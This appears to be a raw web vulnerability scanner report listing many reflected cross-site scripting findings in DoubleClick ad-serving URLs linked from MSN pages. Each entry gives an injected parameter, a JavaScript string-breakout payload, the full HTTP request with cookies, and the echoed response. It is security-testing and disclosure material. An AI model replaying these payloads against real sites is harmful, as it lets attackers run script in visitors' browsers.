<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdh ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f26"-alert(1)-"730d1c99e22 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... JobMapFree_YahooTax_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=856816067f26"-alert(1)-"730d1c99e22&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c10f"-alert(1)-"a01146a9b07 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=17476652107c10f"-alert(1)-"a01146a9b07&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4995c"-alert(1)-"15005a1e215 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea10104995c"-alert(1)-"15005a1e215&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/j ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d7f"-alert(1)-"cc146351d59 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]...
var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFOb3d7f"-alert(1)-"cc146351d59&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B40453887/40471674/4%3B%3B%7Esscs%3D%3fhttp ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59f2"-alert(1)-"a445a26e2b7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241b59f2"-alert(1)-"a445a26e2b7&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d1cb"-alert(1)-"68a2a9ab89b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Scroll_FREE_N_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G7d1cb"-alert(1)-"68a2a9ab89b&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/i%3B239596046%3B0-0%3B0%3B62431291%3B19184-954/60%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 121f1"-alert(1)-"a54ea376143 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/job_map_f?cid= ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1ecf"-alert(1)-"c71a3ff6507 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 7/TT_CoreGPS_JobMapFree_YahooTax_954x60.jpg"; var minV = 9; var FWH = ' width="954" height="60" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B6243129 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b7d"-alert(1)-"d594f3953b8 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cce8"-alert(1)-"9bf53ef1aeb was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84d99"-alert(1)-"61719917f50 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54eb3"-alert(1)-"db1f9ed8dee was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90776"-alert(1)-"bf4f4a050a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2b0c"-alert(1)-"b64a598cf19 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edbfd"-alert(1)-"dcc08de5e14 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 522ce"-alert(1)-"6f4be5c894c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97dd"-alert(1)-"9bf7dd8f0c5 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908e97dd"-alert(1)-"9bf7dd8f0c5&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
